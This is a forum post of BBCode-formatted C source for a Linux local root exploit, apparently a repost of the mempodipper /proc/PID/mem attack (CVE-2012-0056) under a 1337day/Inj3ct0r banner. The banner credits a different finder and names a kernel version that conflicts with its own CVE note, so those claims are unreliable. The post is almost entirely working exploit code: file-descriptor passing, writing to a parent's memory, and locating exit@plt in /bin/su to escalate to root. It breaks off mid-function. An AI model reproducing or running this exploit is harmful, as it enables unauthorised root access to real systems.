Kod:
[COLOR=#000000][COLOR=#FF8000]/*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
* 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
* 1 \ \____/ >> Exploit database separated by exploit 0
* 0 \/___/ type (local, remote, DoS, etc.) 1
* 1 1
* 0 [+] Site : 1337day.com 0
* 1 [+] Support e-mail : submit[at]1337day.com 1
* 0 0
* 1 ######################################### 1
* 0 I'm Angel Injection member from Inj3ct0r Team 1
* 1 ######################################### 0
* 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
* [+] Linux Kernel 2.6.18-374 Local root Exploit
* [-] Found by Angel Injection
* [-] Version: 2.6.18-374
* [-] Security -::RISK: High
* [-] platforms: linux
* [-] http://1337day.com http://r00tw0rm.com http://i313.cc
* [-] Note: Exploit Found http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c
*/
#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <sys/reg.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>
[/COLOR][COLOR=#0000BB]char [/COLOR][COLOR=#007700]*[/COLOR][COLOR=#0000BB]prog_name[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]int send_fd[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]int sock[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]int fd[/COLOR][COLOR=#007700])
{
[/COLOR][COLOR=#0000BB]char buf[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]struct iovec iov[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]struct msghdr msg[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]struct cmsghdr [/COLOR][COLOR=#007700]*[/COLOR][COLOR=#0000BB]cmsg[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]int n[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]char cms[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]CMSG_SPACE[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sizeof[/COLOR][COLOR=#007700](int))];
[/COLOR][COLOR=#0000BB]buf[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]] = [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]iov[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]iov_base [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]buf[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]iov[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]iov_len [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]memset[/COLOR][COLOR=#007700](&[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]sizeof msg[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]msg_iov [/COLOR][COLOR=#007700]= &[/COLOR][COLOR=#0000BB]iov[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]msg_iovlen [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]msg_control [/COLOR][COLOR=#007700]= ([/COLOR][COLOR=#0000BB]caddr_t[/COLOR][COLOR=#007700])[/COLOR][COLOR=#0000BB]cms[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]msg_controllen [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]CMSG_LEN[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sizeof[/COLOR][COLOR=#007700](int));
[/COLOR][COLOR=#0000BB]cmsg [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]CMSG_FIRSTHDR[/COLOR][COLOR=#007700](&[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]cmsg[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]cmsg_len [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]CMSG_LEN[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sizeof[/COLOR][COLOR=#007700](int));
[/COLOR][COLOR=#0000BB]cmsg[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]cmsg_level [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]SOL_SOCKET[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]cmsg[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]cmsg_type [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]SCM_RIGHTS[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]memmove[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]CMSG_DATA[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]cmsg[/COLOR][COLOR=#007700]), &[/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]sizeof[/COLOR][COLOR=#007700](int));
if (([/COLOR][COLOR=#0000BB]n [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]sendmsg[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sock[/COLOR][COLOR=#007700], &[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700])) != [/COLOR][COLOR=#0000BB]iov[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]iov_len[/COLOR][COLOR=#007700])
return -[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]close[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sock[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]int recv_fd[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]int sock[/COLOR][COLOR=#007700])
{
[/COLOR][COLOR=#0000BB]int n[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]int fd[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]char buf[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]struct iovec iov[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]struct msghdr msg[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]struct cmsghdr [/COLOR][COLOR=#007700]*[/COLOR][COLOR=#0000BB]cmsg[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]char cms[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]CMSG_SPACE[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sizeof[/COLOR][COLOR=#007700](int))];
[/COLOR][COLOR=#0000BB]iov[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]iov_base [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]buf[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]iov[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]iov_len [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]memset[/COLOR][COLOR=#007700](&[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]sizeof msg[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]msg_name [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]msg_namelen [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]msg_iov [/COLOR][COLOR=#007700]= &[/COLOR][COLOR=#0000BB]iov[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]msg_iovlen [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]msg_control [/COLOR][COLOR=#007700]= ([/COLOR][COLOR=#0000BB]caddr_t[/COLOR][COLOR=#007700])[/COLOR][COLOR=#0000BB]cms[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]msg_controllen [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]sizeof cms[/COLOR][COLOR=#007700];
if (([/COLOR][COLOR=#0000BB]n [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]recvmsg[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sock[/COLOR][COLOR=#007700], &[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700])) < [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700])
return -[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
if ([/COLOR][COLOR=#0000BB]n [/COLOR][COLOR=#007700]== [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700])
return -[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]cmsg [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]CMSG_FIRSTHDR[/COLOR][COLOR=#007700](&[/COLOR][COLOR=#0000BB]msg[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]memmove[/COLOR][COLOR=#007700](&[/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CMSG_DATA[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]cmsg[/COLOR][COLOR=#007700]), [/COLOR][COLOR=#0000BB]sizeof[/COLOR][COLOR=#007700](int));
[/COLOR][COLOR=#0000BB]close[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sock[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]unsigned long ptrace_address[/COLOR][COLOR=#007700]()
{
[/COLOR][COLOR=#0000BB]int fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Creating ptrace pipe.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]pipe[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]fcntl[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]F_SETFL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]O_NONBLOCK[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Forking ptrace child.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]int child [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]fork[/COLOR][COLOR=#007700]();
if ([/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]close[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);
[/COLOR][COLOR=#0000BB]char buf[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Waiting for ptraced child to give output on syscalls.\n"[/COLOR][COLOR=#007700]);
for (;;) {
[/COLOR][COLOR=#0000BB]wait[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
if ([/COLOR][COLOR=#0000BB]read[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]], &[/COLOR][COLOR=#0000BB]buf[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]) > [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700])
break;
[/COLOR][COLOR=#0000BB]ptrace[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]PTRACE_SYSCALL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
}
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Error message written. Single stepping to find address.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]struct user_regs_struct regs[/COLOR][COLOR=#007700];
for (;;) {
[/COLOR][COLOR=#0000BB]ptrace[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]PTRACE_SINGLESTEP[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]wait[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]ptrace[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]PTRACE_GETREGS[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], &[/COLOR][COLOR=#0000BB]regs[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#FF8000]#if defined(__i386__)
#define instruction_pointer regs.eip
#define upper_bound 0xb0000000
#elif defined(__x86_64__)
#define instruction_pointer regs.rip
#define upper_bound 0x700000000000
#else
#error "That platform is not supported."
#endif
[/COLOR][COLOR=#007700]if ([/COLOR][COLOR=#0000BB]instruction_pointer [/COLOR][COLOR=#007700]< [/COLOR][COLOR=#0000BB]upper_bound[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]unsigned long instruction [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]ptrace[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]PTRACE_PEEKTEXT[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]instruction_pointer[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
if (([/COLOR][COLOR=#0000BB]instruction [/COLOR][COLOR=#007700]& [/COLOR][COLOR=#0000BB]0xffff[/COLOR][COLOR=#007700]) == [/COLOR][COLOR=#0000BB]0x25ff [/COLOR][COLOR=#FF8000]/* jmp r/m32 */[/COLOR][COLOR=#007700])
return [/COLOR][COLOR=#0000BB]instruction_pointer[/COLOR][COLOR=#007700];
}
}
} else {
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Ptrace_traceme'ing process.\n"[/COLOR][COLOR=#007700]);
if ([/COLOR][COLOR=#0000BB]ptrace[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]PTRACE_TRACEME[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]) < [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] ptrace"[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]close[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);
[/COLOR][COLOR=#0000BB]dup2[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]execl[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"/bin/su"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"su"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"not-a-valid-user"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
}
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]unsigned long objdump_address[/COLOR][COLOR=#007700]()
{
[/COLOR][COLOR=#0000BB]FILE [/COLOR][COLOR=#007700]*[/COLOR][COLOR=#0000BB]command [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]popen[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"r"[/COLOR][COLOR=#007700]);
if (![/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] popen"[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]char result[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]32[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]fgets[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]result[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]32[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]pclose[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]strtoul[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]result[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]16[/COLOR][COLOR=#007700]);
}
[/COLOR][COLOR=#0000BB]unsigned long find_address[/COLOR][COLOR=#007700]()
{
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Ptracing su to find next instruction without reading binary.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]unsigned long address [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]ptrace_address[/COLOR][COLOR=#007700]();
if (![/COLOR][COLOR=#0000BB]address[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] Ptrace failed.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Reading su binary with objdump to find exit@plt.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]address [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]objdump_address[/COLOR][COLOR=#007700]();
if ([/COLOR][COLOR=#0000BB]address [/COLOR][COLOR=#007700]== [/COLOR][COLOR=#0000BB]ULONG_MAX [/COLOR][COLOR=#007700]|| ![/COLOR][COLOR=#0000BB]address[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]prog_name[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]prog_name[/COLOR][COLOR=#007700]);
exit(-[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]);
}
}
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Resolved call address to 0x%lx.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]address[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]address[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]int su_padding[/COLOR][COLOR=#007700]()
{
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Calculating su padding.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]FILE [/COLOR][COLOR=#007700]*[/COLOR][COLOR=#0000BB]command [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]popen[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"/bin/su this-user-does-not-exist 2>&1"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"r"[/COLOR][COLOR=#007700]);
if (![/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] popen"[/COLOR][COLOR=#007700]);
exit([/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]);
}
[/COLOR][COLOR=#0000BB]char result[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]256[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]fgets[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]result[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]256[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]pclose[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]command[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]strstr[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]result[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"this-user-does-not-exist"[/COLOR][COLOR=#007700]) - [/COLOR][COLOR=#0000BB]result[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]int child[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]int sock[/COLOR][COLOR=#007700])
{
[/COLOR][COLOR=#0000BB]char parent_mem[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]256[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]sprintf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]parent_mem[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"/proc/%d/mem"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]getppid[/COLOR][COLOR=#007700]());
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Opening parent mem %s in child.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]parent_mem[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]int fd [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]open[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]parent_mem[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]O_RDWR[/COLOR][COLOR=#007700]);
if ([/COLOR][COLOR=#0000BB]fd [/COLOR][COLOR=#007700]< [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] open"[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Sending fd %d to parent.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]send_fd[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sock[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]int parent[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]unsigned long address[/COLOR][COLOR=#007700])
{
[/COLOR][COLOR=#0000BB]int sockets[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Opening socketpair.\n"[/COLOR][COLOR=#007700]);
if ([/COLOR][COLOR=#0000BB]socketpair[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]AF_UNIX[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]SOCK_STREAM[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]sockets[/COLOR][COLOR=#007700]) < [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] socketpair"[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
}
if ([/COLOR][COLOR=#0000BB]fork[/COLOR][COLOR=#007700]()) {
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Waiting for transferred fd in parent.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]int fd [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]recv_fd[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sockets[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Received fd at %d.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700]);
